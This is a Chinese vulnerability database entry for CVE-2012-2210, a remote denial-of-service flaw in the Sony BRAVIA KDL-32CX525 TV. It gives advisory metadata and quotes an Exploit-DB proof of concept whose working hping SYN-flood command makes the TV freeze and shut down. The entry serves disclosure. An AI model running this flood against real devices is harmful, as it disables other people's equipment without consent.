Sony BRAVIA TV拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121034 漏洞类型 资源管理错误
发布时间 2012-04-05 更新时间 2012-04-11
CVE编号 CVE-2012-2210 CNNVD-ID CNNVD-201204-091
漏洞平台 Hardware CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/18705
https://www.securityfocus.com/bid/78204
https://cxsecurity.com/issue/WLB-2012040051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201204-091
|漏洞详情
SonyBRAVIAKDL-32CX525是一款高清液晶电视。SonyBRAVIATV中存在拒绝服务漏洞,该漏洞源于处理数据报时的错误。攻击者可利用该漏洞借助暴力攻击导致设备停止响应并最终关闭。KDL-32CX525版本中存在该漏洞,其他版本也可能受到影响。
|漏洞EXP
# Exploit Title: Sony Bravia Remote Denial of Service
# Date: 04/04/2012
# Author: Gabriel Menezes Nunes
# Version: Sony Bravia TV
# Tested on: Sony Bravia TV (KDL-32CX525)
# CVE: CVE-2012-2210

Playing with my TV, I found a bug that can crash the device.

Running a hping command against a Sony Bravia TV (KDL-32CX525),
all the functions stop working instantly. You cannot change the
volume, channels or access any function. Instantly. After 35 seconds
the TV stop working and back. This happens 3 times. At fourth time, the
TV shuts down. In less than 3 minutes, the TV is off remotely. It is
necessary to turn on the TV physically.

Attack:

hping -S TV.IP.Address -p anyport -i u1 --flood 

Example: hping -S 10.0.0.3 -p 2828 -i u1 --flood
|受影响的产品
Sony Bravia Tv Kdl-32Cx525
|参考资料

来源:EXPLOIT-DB
名称:18705
链接:http://www.exploit-db.com/exploits/18705/
来源:SECUNIA
名称:48705
链接:http://secunia.com/advisories/48705